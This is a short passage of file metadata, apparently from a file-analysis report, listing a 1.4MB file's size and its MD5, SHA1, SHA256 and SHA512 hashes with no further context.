SHA2560995f62bb15b2ee4a631f66a3ebb41b09e81d137fa8390079764fb1d4210a49d
SHA5125c7b882d6db67b3cc53ed53a4e826dc257001f887c1bd19f89aa28d1785a039c7c559613f4bef330def8e0efbdc676101acae617921f0c89f2d2a3192cc80616
-
Filesize
1.4MB
MD5a8cf5621811f7fac55cfe8cb3fa6b9f6
SHA1121356839e8138a03141f5f5856936a85bd2a474
SHA256614a0362ab87cee48d0935b5bb957d539be1d94c6fdeb3fe42fac4fbe182c10c
SHA5124479d951435f222ca7306774002f030972c9f1715d6aaf512fca9420dd79cb6d08240f80129f213851773290254be34f0ff63c7b1f4d554a7db5f84b69e84bdd